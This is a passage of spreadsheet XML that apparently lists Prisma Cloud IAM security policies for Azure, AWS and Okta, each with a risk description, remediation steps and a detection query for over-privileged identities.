      </c>
      <c r="Y3102" t="inlineStr"/>
      <c r="Z3102" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type = 'Service Principal' AND dest.cloud.service.name = 'Microsoft.KeyVault' AND dest.cloud.resource.name = '*' AND action.name DOES NOT END WITH 'read'</t>
        </is>
      </c>
      <c r="AA3102" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3102" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3102" t="inlineStr"/>
      <c r="AD3102" t="b">
        <v>1</v>
      </c>
      <c r="AE3102" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3102" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>ab7d320a-0634-4c18-ac13-98b1f1f7c290</t>
        </is>
      </c>
      <c r="AI3102" t="inlineStr">
        <is>
          <t>ab7d320a-0634-4c18-ac13-98b1f1f7c290</t>
        </is>
      </c>
      <c r="AJ3102" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3102" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3103">
      <c r="A3103" t="inlineStr"/>
      <c r="B3103" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3103" s="2" t="inlineStr"/>
      <c r="D3103" t="inlineStr"/>
      <c r="E3103" t="inlineStr"/>
      <c r="F3103" t="inlineStr"/>
      <c r="G3103" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3103" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3103" t="inlineStr">
        <is>
          <t>Azure Managed Identity (user assigned or system assigned) with broad Key Vault management access</t>
        </is>
      </c>
      <c r="L3103" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3103" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3103" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3103" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3103" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3103" t="inlineStr"/>
      <c r="R3103" t="inlineStr"/>
      <c r="S3103" t="inlineStr"/>
      <c r="T3103" t="b">
        <v>0</v>
      </c>
      <c r="U3103" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3103" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3103" t="inlineStr">
        <is>
          <t>Managed identities provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Providing Key Vault management access lets non-human identities manage key vaults. The least privilege model should be enforced and unused sensitive permissions should be revoked</t>
        </is>
      </c>
      <c r="X3103"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and the role with permissions to Microsoft KeyVault
    6. Remove the assignment
    7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only the Key Vaults that this identity requires access to, if necessary</t>
        </is>
      </c>
      <c r="Y3103" t="inlineStr"/>
      <c r="Z3103" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND dest.cloud.service.name = 'Microsoft.KeyVault' AND dest.cloud.resource.name = '*' AND action.name DOES NOT END WITH 'read'</t>
        </is>
      </c>
      <c r="AA3103" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3103" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3103" t="inlineStr"/>
      <c r="AD3103" t="b">
        <v>1</v>
      </c>
      <c r="AE3103" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3103" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>980343f0-8764-4f2c-8341-ffa15c9a5a0b</t>
        </is>
      </c>
      <c r="AI3103" t="inlineStr">
        <is>
          <t>980343f0-8764-4f2c-8341-ffa15c9a5a0b</t>
        </is>
      </c>
      <c r="AJ3103" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3103" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3104">
      <c r="A3104" t="inlineStr"/>
      <c r="B3104" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3104" s="2" t="inlineStr"/>
      <c r="D3104" t="inlineStr"/>
      <c r="E3104" t="inlineStr"/>
      <c r="F3104" t="inlineStr"/>
      <c r="G3104" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3104" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3104" t="inlineStr">
        <is>
          <t>Azure Users and Machine Identities with IAM Data Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3104" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3104" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3104" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3104" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3104" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3104" t="inlineStr"/>
      <c r="R3104" t="inlineStr"/>
      <c r="S3104" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3104" t="b">
        <v>1</v>
      </c>
      <c r="U3104" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3104" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3104" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Identities with Stale Data Write Permissions.
Unused Azure AD identities with "Data Write" permissions pose a critical security risk, even after 90 days of inactivity. Here's why:
Unrestricted Data Modification: Data Write allows users or machine identities to modify, alter, or even delete critical data stored in Azure services. An attacker with these permissions could cause significant damage, corrupting or stealing sensitive information.
Privilege Escalation: Data Write permissions can be a gateway to further compromise. Attackers might exploit them to gain broader control over your Azure environment and access even more critical resources.
Imagine giving someone a key to your company safe and then forgetting about it. Unused Data Write access is just as dangerous. Here's how to mitigate the risk:
Aggressive Review: Proactively identify and disable all unused Azure AD identities with Data Write permissions, regardless of inactivity time.
Least Privilege Principle: Grant Data Write permissions only to specific users or machine identities that absolutely require them, and only for the minimum time necessary. Utilize Azure RBAC for granular control.
Mandatory MFA: Enforce Multi-Factor Authentication (MFA) for all identities with Data Write permissions. This significantly reduces the risk of unauthorized access, even if credentials are compromised.</t>
        </is>
      </c>
      <c r="X3104"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Azure-managed identity and the role with over-privileged permissions
6. Remove the assignment
7. Create a new assignment with a built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y310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104" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and action.access.level = 'Data Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3104" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3104" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3104" t="inlineStr"/>
      <c r="AD3104" t="b">
        <v>1</v>
      </c>
      <c r="AE3104" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3104" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>5f5c09ac-edb5-41a8-b841-de2ad75c01d6</t>
        </is>
      </c>
      <c r="AI3104" t="inlineStr">
        <is>
          <t>5f5c09ac-edb5-41a8-b841-de2ad75c01d6</t>
        </is>
      </c>
      <c r="AJ3104" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3104" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3105">
      <c r="A3105" t="inlineStr"/>
      <c r="B3105" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3105" s="2" t="inlineStr"/>
      <c r="D3105" t="inlineStr"/>
      <c r="E3105" t="inlineStr"/>
      <c r="F3105" t="inlineStr"/>
      <c r="G3105" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3105" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3105" t="inlineStr">
        <is>
          <t>Azure Managed Identity (user assigned or system assigned) with the Azure built-in roles of Reader</t>
        </is>
      </c>
      <c r="L3105" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3105" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3105" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3105" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3105" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3105" t="inlineStr"/>
      <c r="R3105" t="inlineStr"/>
      <c r="S3105" t="inlineStr"/>
      <c r="T3105" t="b">
        <v>0</v>
      </c>
      <c r="U3105" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3105" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3105" t="inlineStr">
        <is>
          <t>Managed identities provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Using the Azure built-in role of Reader with managed identities provides broad permissions sets for a non-human identity that can lead to several scenarios of subscription information enumeration</t>
        </is>
      </c>
      <c r="X3105"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'Reader' definition role that you want to examine and select the Assignments tab to view all the assignments associated with the selected role
7. Remove user assigned or system assigned managed identity from the list</t>
        </is>
      </c>
      <c r="Y3105" t="inlineStr"/>
      <c r="Z3105" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Reader'</t>
        </is>
      </c>
      <c r="AA3105" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3105" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3105" t="inlineStr"/>
      <c r="AD3105" t="b">
        <v>1</v>
      </c>
      <c r="AE3105" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3105" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>45dad4ec-29c4-4de4-be24-3043d385e209</t>
        </is>
      </c>
      <c r="AI3105" t="inlineStr">
        <is>
          <t>45dad4ec-29c4-4de4-be24-3043d385e209</t>
        </is>
      </c>
      <c r="AJ3105" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3105" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3106">
      <c r="A3106" t="inlineStr"/>
      <c r="B3106" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3106" s="2" t="inlineStr"/>
      <c r="D3106" t="inlineStr"/>
      <c r="E3106" t="inlineStr"/>
      <c r="F3106" t="inlineStr"/>
      <c r="G3106" t="b">
        <v>1</v>
      </c>
      <c r="H31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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3106" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3106" t="inlineStr">
        <is>
          <t>Azure IAM effective permissions are over-privileged (7 days)</t>
        </is>
      </c>
      <c r="L3106" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3106" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3106" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3106" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3106" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3106" t="inlineStr"/>
      <c r="R3106" t="inlineStr"/>
      <c r="S3106" t="inlineStr"/>
      <c r="T3106" t="b">
        <v>1</v>
      </c>
      <c r="U3106" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3106" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3106" t="inlineStr">
        <is>
          <t>This policy identifies Azure IAM permissions that are over-privileged. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3106"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 Assignments tab to access the role bindings available for the selected subscription
5. Find the assignment between the azure managed Identity or the user and the role with over-privileged permissions
6. Remove the assignment
7. Create a new assignment with built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y310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Azure cli commands'</t>
        </is>
      </c>
      <c r="Z3106" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and action.lastaccess.days &gt; 7</t>
        </is>
      </c>
      <c r="AA3106" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3106" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3106" t="inlineStr"/>
      <c r="AD3106" t="b">
        <v>1</v>
      </c>
      <c r="AE3106" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3106" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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6" t="inlineStr">
        <is>
          <t>0c87cdbd-de14-47c8-b0c8-00703291bd29</t>
        </is>
      </c>
      <c r="AI3106" t="inlineStr">
        <is>
          <t>0c87cdbd-de14-47c8-b0c8-00703291bd29</t>
        </is>
      </c>
      <c r="AJ3106" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3106" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3107">
      <c r="A3107" t="inlineStr"/>
      <c r="B3107" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3107" s="2" t="inlineStr"/>
      <c r="D3107" t="inlineStr"/>
      <c r="E3107" t="inlineStr"/>
      <c r="F3107" t="inlineStr"/>
      <c r="G3107" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3107" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3107" t="inlineStr">
        <is>
          <t>Azure Managed Identity (user assigned or system assigned) with the Azure built-in roles of Contributor</t>
        </is>
      </c>
      <c r="L3107" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3107" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3107" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3107" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3107" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3107" t="inlineStr"/>
      <c r="R3107" t="inlineStr"/>
      <c r="S3107" t="inlineStr"/>
      <c r="T3107" t="b">
        <v>0</v>
      </c>
      <c r="U3107" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3107" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3107" t="inlineStr">
        <is>
          <t>Managed identities provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Using the Azure built-in role of Contributor with managed identities provides broad permissions sets for a non-human identity that can lead to privilege escalation. A few examples are virtual machine lateral movement (like running commands on other VMs), storage account access and configuration access</t>
        </is>
      </c>
      <c r="X3107" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Sign in to Azure Management Console
2. Navigate to Azure Subscriptions blade at https://portal.azure.com/#blade/Microsoft_Azure_Billing/SubscriptionsBlade
3. Click on the Azure cloud subscription that you want to examine
4. In the navigation panel, choose Access control (IAM) and select the Roles tab to access the role definitions available for the selected subscription
5. Select BuiltInRole option from the Type dropdown list to return all custom roles available
6. Click on the 'Contributor' definition role that you want to examine and select the Assignments tab to view all the assignments associated with the selected role
7. Remove user assigned or system assigned managed identity from the list</t>
        </is>
      </c>
      <c r="Y3107" t="inlineStr"/>
      <c r="Z3107" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Contributor'</t>
        </is>
      </c>
      <c r="AA3107" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3107" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3107" t="inlineStr"/>
      <c r="AD3107" t="b">
        <v>1</v>
      </c>
      <c r="AE3107" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3107" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>19d9bbe7-81b8-4531-a8d6-c9e29474e18c</t>
        </is>
      </c>
      <c r="AI3107" t="inlineStr">
        <is>
          <t>19d9bbe7-81b8-4531-a8d6-c9e29474e18c</t>
        </is>
      </c>
      <c r="AJ3107" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3107" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3108">
      <c r="A3108" t="inlineStr"/>
      <c r="B3108" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3108" s="2" t="inlineStr"/>
      <c r="D3108" t="n">
        <v>0</v>
      </c>
      <c r="E3108" t="n">
        <v>2</v>
      </c>
      <c r="F3108" t="n">
        <v>0</v>
      </c>
      <c r="G3108" t="b">
        <v>1</v>
      </c>
      <c r="H31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08" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3108" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3108" t="inlineStr">
        <is>
          <t>Compute resource can assume a Service Account with admin privileges in another account</t>
        </is>
      </c>
      <c r="L3108" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3108" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3108" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3108" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3108" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3108" t="inlineStr"/>
      <c r="R3108" t="inlineStr"/>
      <c r="S3108" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3108" t="b">
        <v>1</v>
      </c>
      <c r="U3108" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3108" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3108" t="inlineStr">
        <is>
          <t>Identifies compute resources which can assume service accounts with administrative permissions in a different account. As such, a compromise of this compute resource could allow an adversary to escalate their privileges and further themselves within the environment, moving laterally between the first and second account, greatly increasing the potential blast radius. The service account's attachment to a compute resource exacerbates the issue as the attack surface is larger due to potential compute misconfigurations and weaknesses.</t>
        </is>
      </c>
      <c r="X3108" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the compute instance ("Source") and the role attached to it ("Granted By Entity"). The administrative role will be shown as the "Destination".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310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08" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.type IN ('instance', 'function') AND dest.cloud.resource.type = 'role' AND action.name = 'sts:AssumeRole' AND dest.cloud.resource.isadministrative = true AND dest.cloud.account != source.cloud.account</t>
        </is>
      </c>
      <c r="AA3108" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3108" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3108" t="inlineStr"/>
      <c r="AD3108" t="b">
        <v>1</v>
      </c>
      <c r="AE3108" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3108" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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08" t="inlineStr">
        <is>
          <t>58fb3357-812c-4d5b-af91-2d20e002d39c</t>
        </is>
      </c>
      <c r="AI3108" t="inlineStr">
        <is>
          <t>58fb3357-812c-4d5b-af91-2d20e002d39c</t>
        </is>
      </c>
      <c r="AJ3108" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3108" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3109">
      <c r="A3109" t="inlineStr"/>
      <c r="B3109" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3109" s="2" t="inlineStr"/>
      <c r="D3109" t="n">
        <v>2</v>
      </c>
      <c r="E3109" t="n">
        <v>0</v>
      </c>
      <c r="F3109" t="n">
        <v>0</v>
      </c>
      <c r="G3109" t="b">
        <v>1</v>
      </c>
      <c r="H31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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3109" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3109" t="inlineStr">
        <is>
          <t>AWS ECS Task Definition with IAM policy management permissions</t>
        </is>
      </c>
      <c r="L3109" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3109" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3109" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3109" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3109" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3109" t="inlineStr"/>
      <c r="R3109" t="inlineStr"/>
      <c r="S3109" t="inlineStr"/>
      <c r="T3109" t="b">
        <v>1</v>
      </c>
      <c r="U3109" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3109" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3109" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow ECS task definitions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109" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the ECS Task Definition 
3. Find the role used by the ECS Task Definition 
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y310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09"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'ecs' and source.cloud.resource.type = 'task-definition'</t>
        </is>
      </c>
      <c r="AA3109" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3109" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3109" t="inlineStr"/>
      <c r="AD3109" t="b">
        <v>1</v>
      </c>
      <c r="AE3109" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3109" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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09" t="inlineStr">
        <is>
          <t>c89882d6-ed8e-4e95-931a-9f4dd2c6ff74</t>
        </is>
      </c>
      <c r="AI3109" t="inlineStr">
        <is>
          <t>c89882d6-ed8e-4e95-931a-9f4dd2c6ff74</t>
        </is>
      </c>
      <c r="AJ3109" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3109" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3110">
      <c r="A3110" t="inlineStr"/>
      <c r="B3110" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3110" s="2" t="inlineStr"/>
      <c r="D3110" t="inlineStr"/>
      <c r="E3110" t="inlineStr"/>
      <c r="F3110" t="inlineStr"/>
      <c r="G3110" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3110" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3110" t="inlineStr">
        <is>
          <t>Okta user with effective permissions to create AWS IAM users</t>
        </is>
      </c>
      <c r="L3110" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3110" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3110" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3110" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3110" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3110" t="inlineStr"/>
      <c r="R3110" t="inlineStr"/>
      <c r="S3110" t="inlineStr"/>
      <c r="T3110" t="b">
        <v>1</v>
      </c>
      <c r="U3110" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3110" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3110" t="inlineStr">
        <is>
          <t>This policy identifies Okta users that can create an IAM user. This can possibly lead to a backdoor in the cloud environment. Ensure that Okta users has least privilege access by granting only the permissions required to perform a task, instead of providing excessive permissions</t>
        </is>
      </c>
      <c r="X3110" t="inlineStr">
        <is>
          <t>1. Log in to the Okta console
2. Find the role used by the Okta user
3. Navigate to the IAM service
4. Click on Roles
5. Choose the relevant role
6. Under 'Permissions policies', find the relevant policy according to the alert details and remove the action</t>
        </is>
      </c>
      <c r="Y311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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.idp.service = 'okta' and action.name = 'IAM:CreateUser'</t>
        </is>
      </c>
      <c r="AA3110" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3110" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3110" t="inlineStr"/>
      <c r="AD3110" t="b">
        <v>1</v>
      </c>
      <c r="AE3110" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3110" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>7e64df2b-eeed-4b59-8b2e-55735d528e1a</t>
        </is>
      </c>
      <c r="AI3110" t="inlineStr">
        <is>
          <t>7e64df2b-eeed-4b59-8b2e-55735d528e1a</t>
        </is>
      </c>
      <c r="AJ3110" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3110" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3111">
      <c r="A3111" t="inlineStr"/>
      <c r="B3111" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3111" s="2" t="inlineStr"/>
      <c r="D3111" t="inlineStr"/>
      <c r="E3111" t="inlineStr"/>
      <c r="F3111" t="inlineStr"/>
      <c r="G3111" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3111" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3111" t="inlineStr">
        <is>
          <t>AWS IAM User with AWS Organization management permissions</t>
        </is>
      </c>
      <c r="L3111" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3111" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3111" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3111" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3111" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3111" t="inlineStr"/>
      <c r="R3111" t="inlineStr"/>
      <c r="S3111" t="inlineStr"/>
      <c r="T3111" t="b">
        <v>1</v>
      </c>
